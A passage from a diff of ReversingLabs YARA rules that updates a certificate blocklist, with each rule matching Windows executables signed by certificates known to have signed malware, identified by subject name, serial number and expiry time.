"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16176-L16192" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "24474c4033a8cad1690160da64b75a1eec570f56e830967256c19574bde59384" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10314-L10332" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d4f1b75dddd47fe8a19bd8e794b4930bdcaf54d63db57422db0a9b631d4f488d" score = 75 quality = 90 tags = "INFO, FILE" @@ -22537,22 +42328,22 @@ rule REVERSINGLABS_Cert_Blocklist_06Ce209477F1Ac19A2049Bdc5846A831 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Select'Assistance Pro" and pe.signatures[i].serial=="06:ce:20:94:77:f1:ac:19:a2:04:9b:dc:58:46:a8:31" and 1426710344<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DOD MEDIA LIMITED" and (pe.signatures[i].serial=="00:9d:d3:b2:f7:95:7b:a9:9f:4b:04:fc:db:e0:3b:7a:ac" or pe.signatures[i].serial=="9d:d3:b2:f7:95:7b:a9:9f:4b:04:fc:db:e0:3b:7a:ac") and 1646438400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_447F449121B883211663B7B7E2Ead868 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_061051Ff2A8Afab10347A6F1Ff08Ecb6 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a3ee3618-0e20-5d9c-a514-9020607bd1b0" + id = "4e23648f-9770-53ad-9c62-6e6239a02aa7" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16194-L16210" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f473a939d1a27cf53c09d0e4a3753a9444ae3674a55d5b0feafeef6b75dd487f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10334-L10350" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "db3ac3ee326c60e9abc94a2fb53d801637f044e7ab72d69e53958799e48747b7" score = 75 quality = 90 tags = "INFO, FILE" @@ -22562,22 +42353,22 @@ rule REVERSINGLABS_Cert_Blocklist_447F449121B883211663B7B7E2Ead868 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "3 AM CHP" and pe.signatures[i].serial=="44:7f:44:91:21:b8:83:21:16:63:b7:b7:e2:ea:d8:68" and 1443052800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TACHOPARTS SP Z O O" and pe.signatures[i].serial=="06:10:51:ff:2a:8a:fa:b1:03:47:a6:f1:ff:08:ec:b6" and 1606435200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6366A9Ac97Df4De17366943C9B291Aaa : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Eda2429083Bfafb04E6E7Bdda1B08834 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "77d6756b-e948-5771-9ec1-f5159b0e792c" + id = "0f5852c4-7866-5e12-97e9-c73972def6c5" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16212-L16228" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "dcdfb78d4d779b1cabcdf5b2da1fa27aaa9faaed4d4967630ce45f30304fe227" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10352-L10370" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4f7d5c6929fe364c8868fddb28dd7bbf7cdcf3896d57836466af1a538190d11c" score = 75 quality = 90 tags = "INFO, FILE" @@ -22587,22 +42378,22 @@ rule REVERSINGLABS_Cert_Blocklist_6366A9Ac97Df4De17366943C9B291Aaa : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "xlgames" and pe.signatures[i].serial=="63:66:a9:ac:97:df:4d:e1:73:66:94:3c:9b:29:1a:aa" and 1326796477<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OWLNET LIMITED" and (pe.signatures[i].serial=="00:ed:a2:42:90:83:bf:af:b0:4e:6e:7b:dd:a1:b0:88:34" or pe.signatures[i].serial=="ed:a2:42:90:83:bf:af:b0:4e:6e:7b:dd:a1:b0:88:34") and 1625011200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_66E3F0B4459F15Ac7F2A2B44990Dd709 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0A590154B5980E566314122987Dea548 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2fc1303f-e559-59ba-a1b9-b74a154d8805" + id = "fd2a2165-494b-5655-a322-73f033643c74" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16230-L16246" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a563f1485ae8887c46f45d1366f676894c7db55954671825b37372f786ce0d3d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10372-L10388" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d5fdf2bc61fadf3e73bcf1695c48ebc465e614cdd2310f9e5f40648d9615afc4" score = 75 quality = 90 tags = "INFO, FILE" @@ -22612,22 +42403,22 @@ rule REVERSINGLABS_Cert_Blocklist_66E3F0B4459F15Ac7F2A2B44990Dd709 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "KOG Co., Ltd." and pe.signatures[i].serial=="66:e3:f0:b4:45:9f:15:ac:7f:2a:2b:44:99:0d:d7:09" and 1320288125<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Maya logistika d.o.o." and pe.signatures[i].serial=="0a:59:01:54:b5:98:0e:56:63:14:12:29:87:de:a5:48" and 1636416000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_610039D6349Ee531E4Caa3A65D100C7D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_69A72F5591Ad78A0825Fbb9402Ab9543 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "de018b47-9fbd-590e-b3d1-b50029496718" + id = "938cdd31-433d-5df7-b00e-54a7e440810b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16248-L16264" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e6b6a90cf40283d2e4d2d9c5732a078c9f2f117e3639ab5c0dd6c5323cb7c9ff" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10390-L10406" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "72ca07b7722f9506c5c42b5e58c5ce9b3a7d607164a5f265015769f2831cd588" score = 75 quality = 90 tags = "INFO, FILE" @@ -22637,22 +42428,22 @@ rule REVERSINGLABS_Cert_Blocklist_610039D6349Ee531E4Caa3A65D100C7D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Wemade Entertainment" and pe.signatures[i].serial=="61:00:39:d6:34:9e:e5:31:e4:ca:a3:a6:5d:10:0c:7d" and 1341792000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PUSH BANK LIMITED" and pe.signatures[i].serial=="69:a7:2f:55:91:ad:78:a0:82:5f:bb:94:02:ab:95:43" and 1581811200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1Caa0D0Dadf32A2404A75195Ae47820A : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0883Db137021B51F3A2A08A76A4Bc066 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5c1f82a4-c64d-556c-8c7a-213582e7bd5a" + id = "792111be-7c8a-53f5-9ec3-e1f25f083666" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16266-L16282" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ab71e485c0b541fae79d246d34b1f4fb146747c1c3fb723aa87a7a32378ff974" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10408-L10424" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5e3c8654169830790665992f5d7669d0ca6c1c8048580b3ae70331ad2a763a6c" score = 75 quality = 90 tags = "INFO, FILE" @@ -22662,22 +42453,22 @@ rule REVERSINGLABS_Cert_Blocklist_1Caa0D0Dadf32A2404A75195Ae47820A : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LivePlex Corp" and pe.signatures[i].serial=="1c:aa:0d:0d:ad:f3:2a:24:04:a7:51:95:ae:47:82:0a" and 1324425600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Divertida Creative Limited" and pe.signatures[i].serial=="08:83:db:13:70:21:b5:1f:3a:2a:08:a7:6a:4b:c0:66" and 1627430400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_140D2C515E8Ee9739Bb5F1B2637Dc478 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_2B921Aaaba777B5A99507196C6F1C46C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "69f3ee46-87d2-5630-ba7c-4ed2924cf650" + id = "0cb5be9e-a0b7-5785-87f3-ad097d4ab479" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16284-L16300" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e6724fe80959592c8741621ce604518d3e964cee5941257a99dda78b9c8bbdac" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10426-L10442" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a00eb9837f7700d83862dff2077d85c68c24621d7aacf857b42587dc37976465" score = 75 quality = 90 tags = "INFO, FILE" @@ -22687,22 +42478,22 @@ rule REVERSINGLABS_Cert_Blocklist_140D2C515E8Ee9739Bb5F1B2637Dc478 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Guangzhou YuanLuo Technology Co.,Ltd" and pe.signatures[i].serial=="14:0d:2c:51:5e:8e:e9:73:9b:b5:f1:b2:63:7d:c4:78" and 1386806400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Python Software Foundation" and pe.signatures[i].serial=="2b:92:1a:aa:ba:77:7b:5a:99:50:71:96:c6:f1:c4:6c" and 1648425600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_58015Acd501Fc9C344264Eace2Ce5730 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0332D5C942869Bdcabf5A8266197Cd14 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "28a56bcf-1f13-5478-a6d5-7595464da198" + id = "b1c650bb-b53f-5cca-8cc2-4d3498285d31" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16302-L16318" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7c1bec5059d40fc326bb08775888ed169abc746228eeb42c897f479992c5acab" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10444-L10460" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "726ac44dd8109fcd0a9120f6c0673b8ecf7d5b3a4bb81976f48402e21502201a" score = 75 quality = 90 tags = "INFO, FILE" @@ -22712,22 +42503,22 @@ rule REVERSINGLABS_Cert_Blocklist_58015Acd501Fc9C344264Eace2Ce5730 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Nanjing Ranyi Technology Co., Ltd. " and pe.signatures[i].serial=="58:01:5a:cd:50:1f:c9:c3:44:26:4e:ac:e2:ce:57:30" and 1352246400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "JAWRO SP Z O O" and pe.signatures[i].serial=="03:32:d5:c9:42:86:9b:dc:ab:f5:a8:26:61:97:cd:14" and 1622160000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0B7279068Beb15Ffe8060D2C56153C35 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4679C5398A279318365Fd77A84445699 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "78bfa550-d85e-5776-a65d-ff0039abd2c4" + id = "8d1810e7-9b64-52b3-91c6-f03832d61d3a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16320-L16336" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ca00f1adacd6ff16e54b85be38c3a4545a10c76548e0647f7f3f6cfa4dff412d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10462-L10478" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "bdb68be92b3ba6b5eaa6e8e963529c0b9213942ba2552c687496ad5d12d5b472" score = 75 quality = 90 tags = "INFO, FILE" @@ -22737,22 +42528,22 @@ rule REVERSINGLABS_Cert_Blocklist_0B7279068Beb15Ffe8060D2C56153C35 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Guangzhou YuanLuo Technology Co.,Ltd" and pe.signatures[i].serial=="0b:72:79:06:8b:eb:15:ff:e8:06:0d:2c:56:15:3c:35" and 1350864000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HURT GROUP HOLDINGS LIMITED" and pe.signatures[i].serial=="46:79:c5:39:8a:27:93:18:36:5f:d7:7a:84:44:56:99" and 1643846400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0Bc0F18Da36702E302Db170D91Dc9202 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_101D6A5A29D9A77807553Ceac669D853 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "977d9686-d811-5416-b090-d4f45d7935d0" + id = "918fa696-5c92-551b-a87b-6410a6dc718a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16338-L16354" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d9ee2cf63a4edb28f894ea49a5b4df9b818d5764d9a74721b1d5222f53859462" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10480-L10496" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "bce92750f71477ecfa7b8213724344708066c0e6133a47cd6758bbd9f8f9da5f" score = 75 quality = 90 tags = "INFO, FILE" @@ -22762,22 +42553,22 @@ rule REVERSINGLABS_Cert_Blocklist_0Bc0F18Da36702E302Db170D91Dc9202 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Foresee Consulting Inc." and pe.signatures[i].serial=="0b:c0:f1:8d:a3:67:02:e3:02:db:17:0d:91:dc:92:02" and 1637712000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIC GROUP LIMITED" and pe.signatures[i].serial=="10:1d:6a:5a:29:d9:a7:78:07:55:3c:ea:c6:69:d8:53" and 1646352000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Ca9B6F49B8B41204A174C751C73Dc393 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_6000F8C02B0A15B1E53B8399845Faddf : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d09658e4-44e4-5c10-a866-ba486000f1b6" + id = "b025fe73-89fa-55f2-8b3a-cb46251669e6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16356-L16374" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0b6558a7a1b78d471aaadced959ba91e411df50e3cc08e447fe9bd97f9e5cced" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10498-L10514" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "00ceb241555154cab97ef616042dbd966f3a8fae257e142dfe6bad9559bd1724" score = 75 quality = 90 tags = "INFO, FILE" @@ -22787,22 +42578,22 @@ rule REVERSINGLABS_Cert_Blocklist_Ca9B6F49B8B41204A174C751C73Dc393 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CodeDance Ltd" and (pe.signatures[i].serial=="00:ca:9b:6f:49:b8:b4:12:04:a1:74:c7:51:c7:3d:c3:93" or pe.signatures[i].serial=="ca:9b:6f:49:b8:b4:12:04:a1:74:c7:51:c7:3d:c3:93") and 1654646400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SAY LIMITED" and pe.signatures[i].serial=="60:00:f8:c0:2b:0a:15:b1:e5:3b:83:99:84:5f:ad:df" and 1644278400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Aaf65B8E7A2E68Bc8C9E8F27331B795C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_121070Be1E782F206985543Bc7Bc58B6 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ccb36b8b-301d-5cc2-9c8e-4956b92c1116" + id = "3f5eee11-4106-5923-9563-84f81199bea0" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16376-L16394" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "390d074da09d8e5b4bb2a6f4157a5125474ab5c22de62729d4fc4075edade289" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10516-L10532" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a5d603cf64c8a16fa12daf9c6b5d0850e6145fb39b38442ed724ec0f849b8be9" score = 75 quality = 90 tags = "INFO, FILE" @@ -22812,22 +42603,22 @@ rule REVERSINGLABS_Cert_Blocklist_Aaf65B8E7A2E68Bc8C9E8F27331B795C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ALISA L LIMITED" and (pe.signatures[i].serial=="00:aa:f6:5b:8e:7a:2e:68:bc:8c:9e:8f:27:33:1b:79:5c" or pe.signatures[i].serial=="aa:f6:5b:8e:7a:2e:68:bc:8c:9e:8f:27:33:1b:79:5c") and 1549324800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Prod Can Holdings Inc." and pe.signatures[i].serial=="12:10:70:be:1e:78:2f:20:69:85:54:3b:c7:bc:58:b6" and 1647820800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_C6Ed0Efe2844Fa44Aae350C6845C3331 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_5226A724Cfa0B4Bc0164Ecda3F02A3Dc : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d748bea4-8d2b-53b2-8184-ea0972ad9199" + id = "5a4abffb-ac0d-5e70-8193-0cd1a83377ac" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16396-L16414" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5c4afcd8ceb5cc2f1df2303183ede2081b86365eeee7d4e1319a8ed9a45bbf0b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10534-L10550" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0ba1155b30761f48674aaa82a70a06fea30cced6518f089f3f9f173a4eb06a09" score = 75 quality = 90 tags = "INFO, FILE" @@ -22837,22 +42628,22 @@ rule REVERSINGLABS_Cert_Blocklist_C6Ed0Efe2844Fa44Aae350C6845C3331 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "THE COMPANY OF WORDS LTD" and (pe.signatures[i].serial=="00:c6:ed:0e:fe:28:44:fa:44:aa:e3:50:c6:84:5c:33:31" or pe.signatures[i].serial=="c6:ed:0e:fe:28:44:fa:44:aa:e3:50:c6:84:5c:33:31") and 1549324800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VALENTE SP Z O O" and pe.signatures[i].serial=="52:26:a7:24:cf:a0:b4:bc:01:64:ec:da:3f:02:a3:dc" and 1647302400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Ede6Cfbf9Fa18337B0Fdb49C1F693020 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0A7Be7722B65A866Ebcd3Bd7F8F10825 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0389d5ba-4535-5277-9c77-bd178e66417f" + id = "2b177573-8b9f-538f-8d07-b7baede1148d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16416-L16434" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a7f18d0028cbc0001a196bc915b7881244a5833dd65f96dd7d2e8ab1b0622e0c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10552-L10568" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c4aa22241ef72d454db4ec0fb0933abfa7b1d8d1029b45410475832cda4a2af4" score = 75 quality = 90 tags = "INFO, FILE" @@ -22862,22 +42653,22 @@ rule REVERSINGLABS_Cert_Blocklist_Ede6Cfbf9Fa18337B0Fdb49C1F693020 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "START ARCHITECTURE LTD" and (pe.signatures[i].serial=="00:ed:e6:cf:bf:9f:a1:83:37:b0:fd:b4:9c:1f:69:30:20" or pe.signatures[i].serial=="ed:e6:cf:bf:9f:a1:83:37:b0:fd:b4:9c:1f:69:30:20") and 1554940800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Rebound Infotech Limited" and pe.signatures[i].serial=="0a:7b:e7:72:2b:65:a8:66:eb:cd:3b:d7:f8:f1:08:25" and 1637971200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Eda0F47B3B38E781Cdf6Ef6Be5D3F6Ee : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_05634456Dbedb3556Ca8415E64815C5D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "308a73cd-a142-56ad-8dca-808ab455b43e" + id = "c9a05c35-2aed-5944-aad7-65ae2c290c6c" date = "2023-11-08" modified = 